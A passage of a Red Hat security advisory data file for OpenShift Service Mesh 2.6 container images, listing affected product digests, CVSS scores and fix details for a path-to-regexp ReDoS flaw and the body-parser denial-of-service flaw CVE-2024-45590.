"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", 